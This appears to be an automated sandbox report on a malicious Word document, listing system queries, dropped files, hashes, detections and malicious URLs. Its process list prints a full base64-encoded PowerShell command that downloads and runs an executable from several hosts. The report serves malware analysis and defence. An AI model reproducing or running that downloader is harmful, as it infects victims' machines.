NABoADQATgA9ACgAJ			Jump to behavior

Language, Device and Operating System Detection:

Queries the installation date of Windows

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\810.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\startedradar.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Contains functionality to query time zone information

Show sources

Source: C:\Users\user\810.exe

Code function: 6_2_00D0332D GetVersion,GetVersion,GetLargePageMinimum,GetTimeZoneInformation,GetTimeZoneInformation,CloseHandle,IsTokenRestricted,IsTokenRestricted,VarCyFromR4,

6_2_00D0332D

Contains functionality to query windows version

Show sources

Source: C:\Users\user\810.exe

Code function: 6_2_00D013D2 GetVersion,

6_2_00D013D2

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Show sources

Source: C:\Users\user\810.exe	Code function: 6_2_00D0257B GetVersion,RemoveFontMemResourceEx,RemoveFontMemResourceEx,RemoveClipboardFormatListener,AllocateUserPhysicalPages,AllocateUserPhysicalPages,GetGuiResources,SwitchToThread,		6_2_00D0257B
Source: C:\Users\user\810.exe	Code function: 6_1_00D0257B GetVersion,RemoveFontMemResourceEx,RemoveFontMemResourceEx,RemoveClipboardFormatListener,AllocateUserPhysicalPages,AllocateUserPhysicalPages,GetGuiResources,SwitchToThread,		6_1_00D0257B

Signature Similarity

Sample Distance (10 = nearest)

10 9 8 7 6 5 4 3 2 1

Similar Samples

Samplename	Analysis ID	SHA256	Similarity

Behavior Graph

Simulations

Behavior and APIs

Time	Type	Description
20:12:34	API Interceptor	251x Sleep call for process: iexplore.exe modified
20:12:55	API Interceptor	1x Sleep call for process: powershell.exe modified
20:13:14	API Interceptor	2x Sleep call for process: 810.exe modified
20:13:22	API Interceptor	2x Sleep call for process: startedradar.exe modified

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
7.2.810.exe.f0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.810.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.2.startedradar.exe.110000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.2.startedradar.exe.2a0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.2.startedradar.exe.280000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.2.810.exe.110000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.2.startedradar.exe.f0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.810.exe.3e0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Download
http://chileven.com/YAsyH	0%	Avira URL Cloud	safe	Download File
http://fatrecipesdoc.com/I20clH	0%	Avira URL Cloud	safe	Download File
http://borsacat.com	0%	Avira URL Cloud	safe	Download File
http://chileven.com/YAsyS0Mslz	0%	Avira URL Cloud	safe	Download File
http://idjvn.com/eUH	0%	Avira URL Cloud	safe	Download File
http://borsacat.com/9onrkqJ/H	0%	Avira URL Cloud	safe	Download File
http://borsacat.com/9onrkqJH	0%	Avira URL Cloud	safe	Download File
http://borsacat.com/9onrkqJ	0%	Avira URL Cloud	safe	Download File
http://borsacat.com/9onrH	0%	Avira URL Cloud	safe	Download File
http://borsacat.com/9onrkqH	0%	Avira URL Cloud	safe	Download File
http://idjvn.com/eUBrJig7	0%	Avira URL Cloud	safe	Download File
http://fatrecipesdoc.com/I20cH	0%	Avira URL Cloud	safe	Download File
http://chileven.com/YAsySH	0%	Avira URL Cloud	safe	Download File
http://idjvn.H	0%	Avira URL Cloud	safe	Download File
http://borsacat.cH	0%	Avira URL Cloud	safe	Download File
https://www.leonfurniturestore.com/sec.myacc.resourses.biz/	0%	Avira URL Cloud	safe	Download File
http://huyushop.comH	0%	Avira URL Cloud	safe	Download File
http://fatrecipesdoc.com/I20clMx8H	0%	Avira URL Cloud	safe	Download File
http://huyushop.com/P2ryBfybD	0%	Avira URL Cloud	safe	Download File
http://181.15.224.57/	0%	Avira URL Cloud	safe	Download File
http://borsacat.H	0%	Avira URL Cloud	safe	Download File
http://borsacat.comh%	0%	Avira URL Cloud	safe	Download File
http://leonfurniturestore.com/sec.myacc.resourses.biz/	0%	Avira URL Cloud	safe	Download File
http://idjvn.com/eUBrJH	0%	Avira URL Cloud	safe	Download File
http://borsacat.com/9onrkqJ/	0%	Avira URL Cloud	safe	Download File
http://chileven.com/YAsyS0MslzH	0%	Avira URL Cloud	safe	Download File
http://fatrecipesdoc.com/I20clMx8	0%	Avira URL Cloud	safe	Download File
http://huyushop.com/P2ryBfybDH	0%	Avira URL Cloud	safe	Download File

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Startup

System is w7_1

iexplore.exe (PID: 2320 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: EE79D654A04333F566DF07EBDE217928)

iexplore.exe (PID: 2656 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2320 CREDAT:275457 /prefetch:2 MD5: EE79D654A04333F566DF07EBDE217928)

WINWORD.EXE (PID: 1404 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMAB00G0\eFILE_201902123164.doc MD5: 5D798FF0BE2A8970D932568068ACFD9D)

powershell.exe (PID: 3392 cmdline: POwershell -e JABXADkAaQAyAG4ASQA9ACgAJwBKAGwASQAnACsAJwBSAEIAJwArACcASgBIACcAKQA7ACQASQBBADkANQBZADgAOAAxAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFYAUABpAFoAVQBUAFgAPQAoACcAaAB0AHQAcAA6AC8ALwAnACsAJwBiACcAKwAnAG8AcgBzAGEAJwArACcAYwBhAHQAJwArACcALgAnACsAJwBjACcAKwAnAG8AbQAvADkAbwBuAHIAJwArACcAawBxACcAKwAnAEoAQABoAHQAdABwACcAKwAnADoALwAnACsAJwAvAGMAaABpAGwAZQB2AGUAJwArACcAbgAnACsAJwAuAGMAbwBtAC8AWQBBAHMAeQAnACsAJwBTACcAKwAnADAATQBzAGwAegAnACsAJwBAAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AaAB1ACcAKwAnAHkAJwArACcAdQAnACsAJwBzACcAKwAnAGgAbwAnACsAJwBwACcAKwAnAC4AYwBvAG0AJwArACcALwBQADIAcgB5AEIAZgB5AGIARABAAGgAJwArACcAdAB0AHAAOgAvACcAKwAnAC8AZgBhAHQAJwArACcAcgBlACcAKwAnAGMAaQBwACcAKwAnAGUAcwBkAG8AYwAnACsAJwAuAGMAbwBtAC8ASQAyADAAYwAnACsAJwBsACcAKwAnAE0AeAA4AEAAaAB0ACcAKwAnAHQAcAA6AC8ALwBpAGQAJwArACcAagB2AG4AJwArACcALgAnACsAJwBjAG8AbQAvAGUAVQAnACsAJwBCAHIASgAnACsAJwBpAGcANwAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABZAEYANABoADQATgA9ACgAJwBqAFAAOQB2AFAAJwArACcAMAAzACcAKQA7ACQATwBIAFIAMgBwAGgAUwBYACAAPQAgACgAJwA4ADEAJwArACcAMAAnACkAOwAkAFUAcwBZAEkAUQBLAD0AKAAnAGMAMQAwAEYAJwArACcASQB0ACcAKQA7ACQAUwBOAFAAdwBaAGYAdwBaAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABPAEgAUgAyAHAAaABTAFgAKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABtAGgAMQBhAHoAUwBQAHEAIABpAG4AIAAkAFYAUABpAFoAVQBUAFgAKQB7AHQAcgB5AHsAJABJAEEAOQA1AFkAOAA4ADEALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbQBoADEAYQB6AFMAUABxACwAIAAkAFMATgBQAHcAWgBmAHcAWgApADsAJAByAFMAOQBuAGgAdQBxAD0AKAAnAHUAVgAnACsAJwB6ADYAbQBRACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAFMATgBQAHcAWgBmAHcAWgApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAFMATgBQAHcAWgBmAHcAWgA7ACQAdQB0AGIAdgBVAHcAPQAoACcAaQBxADgAZABqAEcAJwArACcAUAAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASABqAHoARwByAG4AQgAwAD0AKAAnAHIAJwArACcAWABTADYAawAnACsAJwBqAHoAJwApADsA MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

810.exe (PID: 1512 cmdline: 'C:\Users\user\810.exe' MD5: 62C4B4A53927329BBBD9B78DE6E2FC01)

810.exe (PID: 3520 cmdline: C:\Users\user\810.exe MD5: 62C4B4A53927329BBBD9B78DE6E2FC01)

startedradar.exe (PID: 3784 cmdline: C:\Windows\system32\startedradar.exe MD5: 62C4B4A53927329BBBD9B78DE6E2FC01)

startedradar.exe (PID: 3444 cmdline: C:\Windows\system32\startedradar.exe MD5: 62C4B4A53927329BBBD9B78DE6E2FC01)

cleanup

Created / dropped Files

C:\Users\user~1\AppData\Local\Temp\Cab56BA.tmp Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Microsoft Cabinet archive data, 56560 bytes, 1 file
Size (bytes):	56560
Entropy (8bit):	7.995785157236685
Encrypted:	true
MD5:	BB377DF27A55C05BB3793CD1E125C869
SHA1:	295D5A7CB802A8058059F6C29DC2491A15A7D55C
SHA-256:	3C4EC495F17D21CC236BC7238BC02728BD945C07157FBF875CAC340269AFC207
SHA-512:	AA074C05ACDA3414436A3EE01890C08024D6AF96868D856DF0382C9BA531D6701A6EF45A6A0C80FF21670BCF94AE7F1ED5FDEB0E4FA7A5BABF6F8D9FB19F06DC
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\Tar56BB.tmp Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Size (bytes):	137298
Entropy (8bit):	6.4071237290249625
Encrypted:	false
MD5:	5A090F2BC0B31AB45167C1C4A96758DD
SHA1:	358DC4AF3449FB377626B318A785EAFF1CEC6ACC
SHA-256:	636B968161E38DF912038EC7D968A728B67B868EE65F3494D6C047CEA109103B
SHA-512:	91AD9F545F557FD1B1F6C9794A15D457782BD9F9C53660879AF15709C60D3B2C93A11D098A99DDF993628B57AA65B562A6BBB5661C9FB3DA910CEB3A958CBC22
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\~DFACAED153DDE792B8.TMP Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Size (bytes):	29989
Entropy (8bit):	3.1363653218282357
Encrypted:	false
MD5:	061F441C790BF1C098F2B020718C4C8B
SHA1:	184BE0B9B7AD9CBF90BECD7BBAEF54C0BF7BD9DE
SHA-256:	E88772322DFB64F62F602101A48B77B63270A5656CB84CAA27F4A2490B1E3A14
SHA-512:	9F41FB94E7A473A198ACE2A9F656B32D1AFB3A600B8893833B15212FBC1F42008F7EFFE7C3270F81FEA03ABC94C07D8BF628CE0DDA4F7A8C43F2200A352ED3E3
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\~DFEA1CECCC785180E5.TMP Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Size (bytes):	12981
Entropy (8bit):	0.44336075282893084
Encrypted:	false
MD5:	6146A95DA5105621C4C8EC41089B68C5
SHA1:	5240D95A97F24E1FE8F52CE520C7C9EE43DF483F
SHA-256:	BC6564B104C55EBA7EBD3F4346537630512338C6BF202AD14B94B8CB3C0C6132
SHA-512:	CBCEAEB537EC412C0CFF30CBB295729127C5DF861F55A795E32EDADFCD980FE3F624C039C3C3D76623A49D5B936904C9FE379B16A78B11136B4CA7BA75DE8143
Malicious:	false
Reputation:	low

C:\Users\user\810.exe Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):	212992
Entropy (8bit):	6.683953478337834
Encrypted:	false
MD5:	62C4B4A53927329BBBD9B78DE6E2FC01
SHA1:	27FFF99C85E416E27A0C68D942BE1D15182F5426
SHA-256:	5BDBCE2E62D126AEC9B2C13E80140283AFB895DAB289B59B5D8807D068A5D792
SHA-512:	2F52FE34E323D50A75EEE03EF8361484CA6FA112D11BE6121F1F77405E67340AF1FE9DF8C01EF3FA352647D710C843B2DA4686AF8EF368C3F1F30130673D4B75
Malicious:	true
Reputation:	low

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Microsoft Cabinet archive data, 56560 bytes, 1 file
Size (bytes):	56560
Entropy (8bit):	7.995785157236685
Encrypted:	true
MD5:	BB377DF27A55C05BB3793CD1E125C869
SHA1:	295D5A7CB802A8058059F6C29DC2491A15A7D55C
SHA-256:	3C4EC495F17D21CC236BC7238BC02728BD945C07157FBF875CAC340269AFC207
SHA-512:	AA074C05ACDA3414436A3EE01890C08024D6AF96868D856DF0382C9BA531D6701A6EF45A6A0C80FF21670BCF94AE7F1ED5FDEB0E4FA7A5BABF6F8D9FB19F06DC
Malicious:	false
Reputation:	low

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Size (bytes):	328
Entropy (8bit):	3.1118296382936017
Encrypted:	false
MD5:	0BE3C3736CA98ADE02F79B30B445E89E
SHA1:	9AF89F7EFDE15CB75BC4E9C971C8DA0220656EBE
SHA-256:	9DCA8E95123111CAD2C7751B8C557B8738FFA53E13C503C7C89ABD84E96DD0CC
SHA-512:	5702E7E210115B40C25F3AE116A93D6610BC689E46703C5FF3FED2BA272049CAF4178A8AAEA8495C22936F0D6ED25B30D4EA2FEA282071676A6190F797EEF2F9
Malicious:	false
Reputation:	low

C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 4-bit colormap, non-interlaced
Size (bytes):	237
Entropy (8bit):	6.1480026084285395
Encrypted:	false
MD5:	9FB559A691078558E77D6848202F6541
SHA1:	EA13848D33C2C7F4F4BAA39348AEB1DBFAD3DF31
SHA-256:	6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
SHA-512:	0E08938568CD123BE8A20B87D9A3AAF5CB05249DE7F8286FF99D3FA35FC7AF7A9D9797DD6EFB6D1E722147DCFB74437DE520395234D0009D452FB96A8ECE236B
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{257E8AA5-2EFA-11E9-8AFD-B808CF8DE4D6}.dat Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Microsoft Word Document
Size (bytes):	32344
Entropy (8bit):	1.7964997007651438
Encrypted:	false
MD5:	5ECF5A32CFAB54495B48D2CCBEE8CA13
SHA1:	C433742C87F51A718328AB60DBE980027F68DABA
SHA-256:	4041310B2BED4A4D2F7F93D6F6E739343DC60510220E93CB395DC3587A08EB49
SHA-512:	9FAD4C735EC84B29F2B4AB555C877F734A479AA5CADC20F01F023CDDAD1E34ABC83868303AA1AD0369724CBB19EF28E363623F59DCE13C1F4B855D2A5109A2D0
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{257E8AA7-2EFA-11E9-8AFD-B808CF8DE4D6}.dat Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Microsoft Word Document
Size (bytes):	19032
Entropy (8bit):	1.6001453261648433
Encrypted:	false
MD5:	43ACC548E138218EE998F3E3531017EC
SHA1:	3A649F5EC04F2C5791255E77DE6E37D9BC766784
SHA-256:	7C3D8D566EE1ED13183BB47EA484BE886FC6F8AA567A79F0EBC23DB5AA991C55
SHA-512:	D48C448437D7B4DF8FB08FA38DB0E23C9ADCBD1AC5575AD65D8586EEA1BE534F97C1216A6E2D31ED049880DDF9C51D961624F7A7993E04EF6EBAAF10401184E9
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\95UA963V\eFILE_201902123164[1].doc Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes):	179342
Entropy (8bit):	6.1136516921731925
Encrypted:	false
MD5:	83A6D6EE025FE64D36806FE5F19E993B
SHA1:	64947772E7E4293897E9A8DB7A1AFA604645A63F
SHA-256:	AC806D78D25581983F1200B8F3D89C233A76C9D87B03AE1D929EA89D0A72EDC6
SHA-512:	6247E287ABD074F93F727243D3F0E0C2F78DB3399EEC3517A8DF1920EE7E48C3FCA08F77AF52505EBD51534B7F181FBB73C9B26C2EB1F8E665EC7DB88D345A37
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\95UA963V\favicon[1].ico Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 4-bit colormap, non-interlaced
Size (bytes):	237
Entropy (8bit):	6.1480026084285395
Encrypted:	false
MD5:	9FB559A691078558E77D6848202F6541
SHA1:	EA13848D33C2C7F4F4BAA39348AEB1DBFAD3DF31
SHA-256:	6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
SHA-512:	0E08938568CD123BE8A20B87D9A3AAF5CB05249DE7F8286FF99D3FA35FC7AF7A9D9797DD6EFB6D1E722147DCFB74437DE520395234D0009D452FB96A8ECE236B
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G0S767W3\urlblockindex[1].bin Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Size (bytes):	16
Entropy (8bit):	1.6216407621868583
Encrypted:	false
MD5:	FA518E3DFAE8CA3A0E495460FD60C791
SHA1:	E4F30E49120657D37267C0162FD4A08934800C69
SHA-256:	775853600060162C4B4E5F883F9FD5A278E61C471B3EE1826396B6D129499AA7
SHA-512:	D21667F3FB081D39B579178E74E9BB1B6E9A97F2659029C165729A58F1787DC0ADADD980CD026C7A601D416665A81AC13A69E49A6A2FE2FDD0967938AA645C07
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\sec.myacc.resourses[1].htm Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text
Size (bytes):	267
Entropy (8bit):	5.147435832584224
Encrypted:	false
MD5:	959536020CA127F18BD07A5FE1972972
SHA1:	D4EA106947195F61CC6D3B00ADED8AFB9DB8BCB1
SHA-256:	C012460B6A7E99E383919EBBAE7C38B7085416E023EDA2F6AAEBA6C9119B1B71
SHA-512:	5E40116E5C44E578F8F2847CEC891106567627112EE8967C10091EEB97DBDFD4B587650222A4E99FE6608608ABB8FFE6C7611CCFCD38EA19BFE8426DE494FCAD
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMAB00G0\eFILE_201902123164.doc.qhsqbpk.partial Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes):	179342
Entropy (8bit):	6.1136516921731925
Encrypted:	false
MD5:	83A6D6EE025FE64D36806FE5F19E993B
SHA1:	64947772E7E4293897E9A8DB7A1AFA604645A63F
SHA-256:	AC806D78D25581983F1200B8F3D89C233A76C9D87B03AE1D929EA89D0A72EDC6
SHA-512:	6247E287ABD074F93F727243D3F0E0C2F78DB3399EEC3517A8DF1920EE7E48C3FCA08F77AF52505EBD51534B7F181FBB73C9B26C2EB1F8E665EC7DB88D345A37
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMAB00G0\eFILE_201902123164.doc.qhsqbpk.partial:Zone.Identifier Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
MD5:	FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA1:	D59FC84CDD5217C6CF74785703655F78DA6B582B
SHA-256:	EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
SHA-512:	AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMAB00G0\eFILE_201902123164.doc:Zone.Identifier Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	very short file (no magic)
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
MD5:	ECCBC87E4B5CE2FE28308FD9F2A7BAF3
SHA1:	77DE68DAECD823BABBB58EDB1C8E14D7106E83BB
SHA-256:	4E07408562BEDB8B60CE05C1DECFE3AD16B72230967DE01F640B7E4729B49FCE
SHA-512:	3BAFBF08882A2D10133093A1B8433F50563B93C14ACD05B79028EB1D12799027241450980651994501423A66C276AE26C43B739BC65C4E16B10C3AF6C202AEBB
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMAB00G0\~$ILE_201902123164.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	162
Entropy (8bit):	2.961078520155895
Encrypted:	false
MD5:	1F0584A60FA9C24867B6055FD12F0C55
SHA1:	2FEDAAE200EA70F753B72788BB32836C8959EBD9
SHA-256:	1962E21A769721CA64CE0EDBF40602D40B1A0FCB70CA94F63A666ADC7E75CE81
SHA-512:	D9E3F4E5B9356A193C6ED3EC62AA237A95354828397FC9DCBB26A07AC2456876D8AD524C97DC9A3B2A9499C00A2E2C65388986DE2D3262C062A744547E67BBBA
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BFDD4B3A.t12P5Piz Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	[TIFF image data, big-endian, direntries=3], baseline, precision 8, 707x244, frames 3
Size (bytes):	53596
Entropy (8bit):	7.879608410788067
Encrypted:	false
MD5:	DF58042846990A1F644E8EAF20228387
SHA1:	CD359028C8EBA46450BB697AA1605BB994912238
SHA-256:	EA0318505E37077766C39447BBD1C7028D0B4DA8A4962324231867DB143144EE
SHA-512:	0B5EB9E88501344513CAF4A81BB8B36CD12313DAB95F121C3BB7EB49B74D95D2CD6BE64C0BBF2762043CE311A7EB53FD4FD60C83B4A6B4278D61F74952F95615
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{652ECC42-4D79-4BE3-AE05-7C21D29DE255}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{97D9F4A9-6F41-42E1-9E6A-377B6203B06A}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	2118
Entropy (8bit):	0.6223600170475735
Encrypted:	false
MD5:	A3E912891B3EBAA77D823917A16E0F85
SHA1:	8338E5B21213E4C36DEFFC6DF1434D6FFD77DA8F
SHA-256:	36D89C5BBD661D226F9A6BC0D0CD841504AD32E94203F20BD77A8FA6282496BA
SHA-512:	E787BA192D133CE97F9C666F919A696E531FAE557CCF67E1CCCB75936EAF0EC6E8C8E10F0888F929BA4721758339ECFDD41D555E1ACBCF5645C6F577F480DCF1
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	162
Entropy (8bit):	2.961078520155895
Encrypted:	false
MD5:	1F0584A60FA9C24867B6055FD12F0C55
SHA1:	2FEDAAE200EA70F753B72788BB32836C8959EBD9
SHA-256:	1962E21A769721CA64CE0EDBF40602D40B1A0FCB70CA94F63A666ADC7E75CE81
SHA-512:	D9E3F4E5B9356A193C6ED3EC62AA237A95354828397FC9DCBB26A07AC2456876D8AD524C97DC9A3B2A9499C00A2E2C65388986DE2D3262C062A744547E67BBBA
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QNI5LSYZWXHQ6YR80TT5.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	8016
Entropy (8bit):	3.5556092318168546
Encrypted:	false
MD5:	27CA54F1BCCF1888157C3E432208555B
SHA1:	CC5B547791696B3A37A4FE935720957A35FCECC1
SHA-256:	B194F388A591AC66049A265FCE86F2BC3A207DD55A799E08460EC9BB0147F697
SHA-512:	9AFAE81EA5B3C9639106F03BA9F09B5A6A4ABD4FC5A203A179FB557984D8B5F0D479B03C0C9A25F6FC721F69E9787BD82CA15BF2E515162606686B038AAF06D6
Malicious:	false
Reputation:	low

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
